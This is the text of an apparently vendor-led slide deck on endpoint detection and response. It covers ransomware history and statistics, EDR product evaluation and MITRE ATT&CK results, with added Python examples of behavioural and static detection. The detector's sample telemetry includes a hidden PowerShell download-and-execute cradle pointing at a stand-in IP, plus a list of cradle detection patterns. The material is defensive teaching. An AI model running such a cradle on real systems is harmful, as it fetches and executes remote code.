Endpoint Detection
and Response
A deep dive into Endpoint Protection
Systems and their key capabilities
• Cyber Security Lead Engineer
• 17 years' experience with Sec-1 (Claranet Cyber Security)
• Background: implementing cyber security solutions
• Mainly covering SIEM / EDR / Firewall / BAS / MFA
Agenda
Key Security Threats
Threat Evolution - Key dates
• 1986 - First computer virus written for an IBM PC
• 1987 - AV software available
• 1989 - Birth of ransomware (AIDS Trojan)
• 2000 - Love Letter virus (POC for social engineering)
• 2001 - Code Red, 1st fileless malware
• 2003 - SQL Slammer, fileless malware payload delivery
• 2008 - Bitcoin introduced (game changer)
• 2013 - CryptoLocker: the term "ransomware" becomes a household name
• 2016 - Locky (ransomware), healthcare US
• 2017 - WannaCry (ransomware), healthcare UK
• 2017 - Huge data breach (fileless malware)
• 2021 - Ransomware as a service (RaaS)
  - Subscription services available (Dark Web)
  - Affiliate programs: creators gain a % of paid ransoms as commission
  - Open RaaS, closed RaaS, lone wolves
  - Ransomware + data leak bundled
  - Largest ransom ever paid, by CNA Financial: $40m
  - Supply chain attacks
Supply Chain attacks
• SolarWinds Orion attack highlights the difficulty of defending against supply chain attacks.
• Hafnium, Feb 2021
(Diagram labels: Attacker, Backdoor Access)
Threat Evolution - Fileless Malware
(Diagram: general fileless malware example)
Recovery Process
• Pay the ransom
• Reinstall the device
• Restore using a 3rd party system (outside of the EPP)
• KB article - manual clean up
• Ransomware decryption tools (not guaranteed, no ETA)
Investigation
• Root cause analysis / Data
Threat landscape stats

Ransomware stats
• In 2021 the average ransom demand was $5.3m, up 518%
• The average ransom paid by victims was $570,000, up 82%
• The average amount of downtime a company experiences after a ransomware attack is 21 days
• Ransomware attacks increased by 151% so far in 2021, with even higher levels expected in 2022 (due to RaaS providing a lower barrier to entry)

General breach stats
• 4 in every 10 businesses (40%) have reported a cyber breach in the last 12 months
• In medium sized businesses this is 65%
• In large businesses this is 64%
• Attacks leveraging PowerShell grew by 208%
• Attacks leveraging MS Office grew by 199%
Endpoint Detection and Response
Endpoint technology definitions
Endpoint technology definitions (& Next Gen)
Active EDR - Real world example
Active EDR – Theory in the real world
Event 1
PERSON 1 - Parks a car outside the Hatton Garden safety deposit building and sits there for an hour
Event 2
PERSON 2 - Arrives by bus, walks around the perimeter of the building and takes some photos
Event 3
PERSON 3 - "An alarms expert" downloads the specs & design documents for the building's alarm system
Event 4
They all meet up together for a pint in a local pub
Active EDR – Theory in the cyber world
Event 1
Open a spreadsheet containing a macro
Event 2
Enable macros to update a currency exchange rate
Event 3
Macro launches PowerShell
Event 4
PowerShell downloads and executes a payload to memory
Context is key!
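The four cyber events above are exactly the kind of chain an Active EDR correlates: none of them is conclusive alone (Excel is normal, PowerShell is normal, a download is normal), but the ancestry plus the download-and-execute indicators together are. As an added example, not code from the original deck or from any vendor's engine, the Python below builds a process tree from constructed telemetry, walks each leaf process back to its root, and scores the whole storyline. The event records, field names, weights and the 70-point threshold are assumptions chosen for illustration.

```python
"""Toy behavioural correlation over endpoint process telemetry.

Constructed sample events (not real telemetry) model the slide's chain:
Excel opens, a macro spawns PowerShell, PowerShell pulls a payload from
the network and runs it in memory. The alert fires on the ancestry chain
plus the download-and-execute indicators together, not on any single event.
"""
from dataclasses import dataclass
from typing import Optional

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a download cradle / in-memory execution.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression", "iex ",
                  "-encodedcommand", "-enc ", "frombase64string", "net.webclient",
                  "invoke-webrequest", "iwr ")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""
    net_dst: Optional[str] = None   # set when the process made an outbound connection


def build_tree(events):
    """Return pid -> ProcEvent for quick ancestry walks."""
    return {e.pid: e for e in events}


def ancestry(tree, pid):
    """Walk parent links from pid to the root; returns the chain root-first."""
    chain, seen = [], set()
    cur = tree.get(pid)
    while cur is not None and cur.pid not in seen:   # guard against pid reuse loops
        seen.add(cur.pid)
        chain.append(cur)
        cur = tree.get(cur.ppid)
    return list(reversed(chain))


def score_chain(chain):
    """Score a process chain: each indicator alone is weak, together they are strong."""
    score, reasons = 0, []
    images = [e.image.lower() for e in chain]
    leaf = chain[-1]
    cmd = leaf.cmdline.lower()
    if any(i in OFFICE_APPS for i in images) and leaf.image.lower() in SCRIPT_HOSTS:
        score += 40
        reasons.append("office app ancestor spawned a script host")
    hits = [m for m in CRADLE_MARKERS if m in cmd]
    if hits:
        score += 30
        reasons.append(f"download/in-memory markers: {hits}")
    if leaf.net_dst:
        score += 20
        reasons.append(f"outbound connection to {leaf.net_dst}")
    if "-w hidden" in cmd or "-windowstyle hidden" in cmd or "-nop" in cmd:
        score += 10
        reasons.append("hidden-window / no-profile PowerShell flags")
    return score, reasons


def evaluate(events, threshold=70):
    """Return one alert per leaf process whose full storyline scores >= threshold."""
    tree = build_tree(events)
    parents = {e.ppid for e in events}
    alerts = []
    for e in events:
        if e.pid in parents:          # only leaf processes end a storyline
            continue
        chain = ancestry(tree, e.pid)
        score, reasons = score_chain(chain)
        if score >= threshold:
            alerts.append({"storyline": [c.image for c in chain],
                           "score": score, "reasons": reasons})
    return alerts


# Constructed telemetry (assumption: hypothetical hosts, IPs and file names).
MALICIOUS_CHAIN = [
    ProcEvent(100, 1, "explorer.exe"),
    ProcEvent(200, 100, "EXCEL.EXE", "EXCEL.EXE fx_rates.xlsm"),
    ProcEvent(300, 200, "powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://198.51.100.7/u.ps1')\"",
              net_dst="198.51.100.7:80"),
]
# Same download primitive, but an admin ran it from Explorer: scores 50, no alert.
BENIGN_ADMIN = [
    ProcEvent(100, 1, "explorer.exe"),
    ProcEvent(400, 100, "powershell.exe",
              "powershell.exe -c \"Invoke-WebRequest https://internal.example/tools/agent.msi"
              " -OutFile agent.msi\"", net_dst="10.0.0.5:443"),
]

if __name__ == "__main__":
    for alert in evaluate(MALICIOUS_CHAIN):
        print(" -> ".join(alert["storyline"]), alert["score"], alert["reasons"])
    print("benign admin alerts:", evaluate(BENIGN_ADMIN))
```

The benign case is the point of the "context is key" slide: the same Invoke-WebRequest plus network connection scores 50 when its parent is Explorer and 100 when it sits under an Office application with a hidden-window cradle. A real engine also rolls in file writes, registry changes and injected threads, but the ancestry walk is the same.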
Endpoint Detection and Response
Product selection & evaluation
Selecting an Endpoint Solution
Detection / Static AI (Next-Gen)
Decision tree (random forest ML model): each file is classified as Malicious or Benign.
(Diagram: an illustrative decision tree on the features "Attacks without warning", "Enjoys walks with you" and "Falls asleep in odd places", each with true/false branches. Every leaf gives a Dog/Cat probability: Dog 2% / Cat 98%, Dog 70% / Cat 30%, Dog 99% / Cat 1%, Dog 40% / Cat 60%, Dog 3% / Cat 97%, Dog 8% / Cat 92%, Dog 46% / Cat 54%.)
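The Dog/Cat leaves are a stand-in for how a static engine scores a file before it runs: features are extracted from the bytes on disk and an ensemble of trees votes on them. As an added example (not from the original deck, and not any vendor's model), the Python below computes cheap static features such as byte entropy and averages three hand-written trees into a malicious probability. The trees are illustrative rules, not a trained forest, and the two sample files are constructed byte strings, not real malware.

```python
"""Toy 'static AI' classifier: static file features -> ensemble probability.

The three trees are hand-written (assumption: a trained forest would learn
its splits from labelled samples); the files are constructed, not real.
"""
import math
import random


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniformly random).
    Packed or encrypted payloads sit near the top of the range."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def extract_features(data: bytes) -> dict:
    """Features an on-disk-write engine can compute without executing the file."""
    printable = sum(32 <= b < 127 for b in data)
    return {
        "is_pe": data[:2] == b"MZ",                       # DOS/PE header magic
        "entropy": shannon_entropy(data),
        "mostly_text": printable / max(len(data), 1) > 0.6,
        "size": len(data),
    }


# Each "tree" is a tiny decision tree whose leaf is P(malicious).
def tree_entropy(f):
    if f["entropy"] > 7.2:                   # packed / encrypted body
        return 0.90 if f["is_pe"] else 0.70
    return 0.15 if f["is_pe"] else 0.05


def tree_strings(f):
    if f["mostly_text"]:                     # readable strings: scripts, documents
        return 0.10
    return 0.80 if f["is_pe"] else 0.55


def tree_size(f):
    if f["size"] < 4096:                     # tiny droppers / stagers
        return 0.60 if f["is_pe"] else 0.35
    return 0.30


FOREST = [tree_entropy, tree_strings, tree_size]


def classify(data: bytes, threshold: float = 0.5):
    """Average the trees' leaf probabilities; the ensemble mean is the verdict."""
    f = extract_features(data)
    p = sum(t(f) for t in FOREST) / len(FOREST)
    return ("Malicious" if p >= threshold else "Benign"), round(p, 2)


# Constructed samples (not real files). Seeded so the result is repeatable.
_rng = random.Random(1)
PACKED_PE = b"MZ" + bytes(_rng.randrange(256) for _ in range(2000))   # high-entropy body
PLAIN_TEXT = b"Quarterly FX rates\n" * 200                              # low-entropy document

if __name__ == "__main__":
    for name, blob in (("packed PE", PACKED_PE), ("plain text", PLAIN_TEXT)):
        print(name, extract_features(blob)["entropy"], classify(blob))
```

The averaged probability is what a product surfaces as "Suspicious" versus "Malicious" thresholds; the limitation the next slide calls out is also visible here: every feature comes from bytes written to disk, so a script that only ever exists in PowerShell's memory never reaches this function.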
Static AI / Behavioural AI (Next-Gen)

Detection engine / method, with key advantages and disadvantages
• Visibility methods - on disk write ("what is it?")
  Disadvantage: only analyses files written to disk (can't see memory-based script and file execution)
• Active EDR Advanced (threat hunting capabilities)
  Advantage: provides an interface for analysts to pivot around telemetry data from a device to conduct in-depth investigations; supports analyst-driven intelligence to discover threats that legacy detection engines and AI models can't, including living-off-the-land attacks

Evaluation questions
• Implementation and configuration changes - will the product require lots of config changes to perform to its full capability?
• Agent autonomy - does the product have the ability to perform as well, and at machine speed, when offline?
• Remediation and recovery options
  - Can the endpoint solution isolate an infected device from the network to prevent spread?
  - Does the product provide full remediation of an attack storyline (everything the attacker touched, undone)?
  - What about a successful ransomware attack: can the endpoint solution perform a full recovery for you quickly and with no input from 3rd party systems?
• System support - do you need a separate solution to cover other systems in your estate?
  - Remote workers
  - Servers
  - Cloud environments
  - Dev environments (Docker, Kubernetes, Amazon EKS etc.)
Gartner Magic Quadrant Leader
MITRE ATT&CK
https://attackevals.mitre-engenuity.org/enterprise/carbanak_fin7/
Endpoint Detection and Response
Our chosen EDR vendor
Visibility (MITRE ATT&CK results)

Delayed detections (vendors of note)
SentinelOne    0
Sophos         0
Microsoft      1
CrowdStrike   15

Configuration changes (MITRE ATT&CK results)
SentinelOne    0
Sophos         6
CrowdStrike   25
Microsoft     35

Analytic detection coverage (MITRE ATT&CK results, vendors of note)
SentinelOne  159/174
Microsoft    134/174
CrowdStrike   64/174
Sophos        39/174
Storyline Tracking
Detection Engines (Mitre ATT&CK results)
• Reputation Engine
• Static AI “Malicious”
• Static AI “Suspicious”
• Static AI - Executables
• Static AI - Potentially Unwanted Apps
• Behavioural AI – Executables
• Behavioural AI - Documents, Scripts
• Behavioural AI - Lateral Movement
• Behavioural AI - Anti-Exploitation / File-less
• Application control (Containerised workloads)
• Detect Interactive Threats (Insider Threats)
SentinelOne technology overview
MITRE ATT&CK & Gartner Leader
SentinelOne - System architecture (diagram)
Live Ransomware Demo
Recover encrypted files in minutes!
EDR Management Challenges
• Time - to review all suspicious alerts (Next-Gen EDR / meta data) and to perform analysis (Next-Gen AV)
(Diagram: the answer shown is a Security Operations Centre with REMEDIATE and ROLLBACK actions)
• Quarterly Service Reviews
• Monthly Security Reports
Service SLAs & response model
Priority      Response
P1 Critical   Notification within 15 minutes
P2 High       Notification within 30 minutes
P3 Medium     Notification within 2 hours
P4 Low        Notification within 4 hours
Claranet Online
SOC Team - Threat Hunting
• Abnormal behaviour on multiple servers (Exchange, DCs)
• The current AV didn't detect anything suspicious
• SentinelOne found multiple malicious files on customer systems
• Deep Visibility provided the tools and the detailed meta data for the SOC team to identify and nullify this threat.
EDR Service offering
• Licensed Software